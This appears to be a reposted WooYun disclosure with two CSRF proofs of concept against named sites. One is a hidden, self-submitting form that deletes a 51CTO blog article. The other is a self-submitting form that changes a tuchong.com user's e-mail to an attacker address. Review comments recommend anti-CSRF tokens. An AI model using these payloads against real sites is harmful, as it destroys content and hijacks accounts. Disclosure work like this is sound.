http://wooyun.org/bugs/wooyun-2010-052368
已主动反馈给51CTO，对方已修复。
利用该漏洞可以删除不属于自己的文章：从下面的表单可以看出，删除请求只包含 job 和 selid 两个参数，没有任何第三方页面无法预知的令牌。
<!--
  Cross-site request forgery demonstration against the article-delete action.
  The form is a POST with two fields hidden by display:none (job=del and
  selid=<article id>), and the inline script submits it as soon as it is
  parsed, with no action from the visitor.
  The request contains no per-request token, so nothing in it shows that it
  came from the site's own pages.
  NOTE(review): the endpoint should require an unpredictable anti-CSRF token
  bound to the session; it should presumably also check that the session user
  owns the article named by selid (confirm server-side).
-->
<form method='post'action='http://crazysmogu.blog.51cto.com/user_index.php?action=delarticle'> <input type='text'value='del'name='job'style='display:none!important;display:block;width=0;height=0'/> <input type='text'value='1112261'name='selid'style='display:none!important;display:block;width=0;height=0'/> </form> <script>document.forms[0].submit();</script>
<html>
<body>
<form name="csrf" action="http://tuchong.com/api/user/modify/" method="POST">
<input type=text name=section value="basicinfo"></input>
<script>
// Candidate addresses; one of them is picked at random for the user_email field.
var email = [
  'root1@wooyun.org',
  'root2@wooyun.org',
  'root3@wooyun.org',
  'root4@wooyun.org',
  'root5@wooyun.org',
  'root6@wooyun.org',
  'root7@wooyun.org',
  'root8@wooyun.org',
  'root9@wooyun.org',
  'root10@wooyun.org'
];
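/**
 * Return the first `len` elements of a randomly shuffled copy of `arr`.
 *
 * A copy is shuffled with Fisher-Yates so the caller's array keeps its order
 * and every ordering is equally likely. Sorting with a random comparator
 * would reorder the caller's array in place and, because the comparator is
 * inconsistent from one call to the next, would not shuffle uniformly.
 *
 * Math.random() is not a cryptographic source, so the result must not be
 * used where unpredictability matters.
 *
 * @param {Array} arr - Source values; not modified.
 * @param {number} len - End index handed to slice(0, len) on the shuffled copy.
 * @returns {Array} A new array holding the selected elements.
 */
function Rand(arr, len) {
  var pool = arr.slice();
  // Walk from the end, swapping each slot with a random slot at or before it.
  for (var i = pool.length - 1; i > 0; i--) {
    var j = Math.floor(Math.random() * (i + 1));
    var tmp = pool[i];
    pool[i] = pool[j];
    pool[j] = tmp;
  }
  return pool.slice(0, len);
}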
// Writes a text input named user_email into the surrounding form. Its value is
// the single address Rand draws from `email`: Rand returns a one-element
// array, which is converted to a string before being concatenated.
document.write(
  '<input type=text name=user_email value=' +
    String(Rand(email, 1)) +
    '></input>'
);
</script>
<input type="submit" value="submit" />
</form>
<script>
// Submits the form named "csrf" as soon as this script runs, with no click
// from the visitor.
// NOTE(review): the request is a plain cross-site POST carrying only the
// section and user_email fields. The receiving endpoint should reject it
// unless it includes an unpredictable anti-CSRF token tied to the session.
// A change of e-mail address should presumably also require
// re-authentication (confirm against the server).
document.csrf.submit();
</script>
</body>
</html>
转载于:https://blog.51cto.com/929044991/1383799